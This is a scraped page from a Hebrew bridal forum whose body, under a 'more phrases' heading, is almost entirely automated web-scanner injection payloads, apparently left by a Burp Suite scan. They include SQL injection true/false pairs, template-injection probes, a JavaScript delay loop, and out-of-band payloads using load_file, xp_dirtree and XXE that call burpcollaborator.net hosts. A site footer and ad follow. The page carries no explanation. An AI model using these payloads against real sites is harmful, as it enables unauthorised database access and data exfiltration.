פורום כלות

' and '6372'='6373    ' and '6372'='6372    ab5cc%>d0ab1'/"<fdf24    %}f28c8'/"<b07a7    87258974' or 5161=5162--    87258974' or 5161=5161--    }}f1d9e'/"<f3c4e    87258974' or '5161'='5162    87258974' or '5161'='5161    ' (select load_file('\\nzqc4zwlkq0n7nqn4lok5lyh58b8bw6kxnli89wy.burpcollaborator.net\hoh')) '    ');exec master.dbo.xp_dirtree '\3w0s1ft1h6x343n311l021vx2o8o8c30utio5ft4.burpcollaborator.netjhk'--    );exec master.dbo.xp_dirtree '\5tzuyhq3e8u515k5y3i2z3szzq5q5e02rufp2gq5.burpcollaborator.netdka'--    ';exec master.dbo.xp_dirtree '\xvwm09svg0wx3xmx0vku1vur1i7i762utlhg47sw.burpcollaborator.netwju'--    ;exec master.dbo.xp_dirtree '\v51ka72tqy6vdvwvatusbt4pbghgh4cs3irde42t.burpcollaborator.netjlg'--    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % jryzx SYSTEM "http://1vxq0dszg4w131m10zky1zuv1m7m7a2y6m19sxh.burpcollaborator.net/">%jryzx;]>'),'/l') from dual)||'    dad4f%>a92a8'/"<dc50e    %}e74f4'/"<d9e76    }}c08fe'/"<b2712    ' (function(){if(typeof a1285==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);a1285=1;}}()) '    ' and 6945=6946--    ' and 6945=6945--    ' and '6945'='6946    ' and '6945'='6945    29660692' or 6505=6506--    29660692' or 6505=6505--    29660692' or '6505'='6506    29660692' or '6505'='6505    ' (select load_file('\\0ijpncfy33j0q090ny7xoyhuolulv9pxg04vrmfb.burpcollaborator.net\vet')) '    ');exec master.dbo.xp_dirtree '\tyvi35vrjwzt6tpt3rnq4rxn4eaeb25qwjke75vu.burpcollaborator.netcgf'--    );exec master.dbo.xp_dirtree '\hn86stkf8kohvhehsfcetfmbt2z20quel691wskh.burpcollaborator.netdro'--    ';exec master.dbo.xp_dirtree '\w1yl68yumz2w9wsw6uqt7u0q7hdhe58tzknfa6yv.burpcollaborator.netuqr'--    ;exec master.dbo.xp_dirtree '\vxwk27utiyyv5vov2tms3twp3g9ga44svijd64ut.burpcollaborator.net he'--    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % scrgh SYSTEM "http://4ejtjgb2z7f4m454j231k2dykpqprdl1ppkcb00.burpcollaborator.net/">%scrgh;]>'),'/l') from dual)||'    bf15b%>b6178'/"<ffed7    %}d92c9'/"<b6ffd    }}bc2ce'/"<e9111    ' (function(){if(typeof e73c7==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);e73c7=1;}}()) '    ' and 7115=7116--    ' and 7115=7115--    ' and '7115'='7116    ' and '7115'='7115    20568823' or 6923=6924--    20568823' or 6923=6923--    20568823' or '6923'='6924    20568823' or '6923'='6923    ' (select load_file('\\q4vf921opt5qcqvq9otnao3kabgbfz9n0qolbcz1.burpcollaborator.net\jsa')) '    ');exec master.dbo.xp_dirtree '\r6ygb33pru7rerxrbpvocp5lccich0bo2hqcd31s.burpcollaborator.netyxh'--    );exec master.dbo.xp_dirtree '\0wxp1ctyh3x040n01ylx2yvu2l8l791xspgk3br0.burpcollaborator.netygg'--    ';exec master.dbo.xp_dirtree '\zz2o4bwxk20z7zqz4xow5xyt5kbka84wvnji69uy.burpcollaborator.net da'--    ;exec master.dbo.xp_dirtree '\r0sg53xplu1r8rrr5ppo6pzl6cccb05owek970vp.burpcollaborator.netzae'--   
עוד ביטויים

כל הזכויות שמורות kala4kala.co.il
פיתוח: LotemX בניית אתרים ובניית רשת חברתית | עיצוב: 2pm
נכנסת להריון? מזל טוב! כנסי לאמא4אמא ותמצאי שם הכל החל ממחשבון הריון , פורום הריון , עגלות לתינוק , סלקלים ועוד זמן טעינה: 0.0381 שניות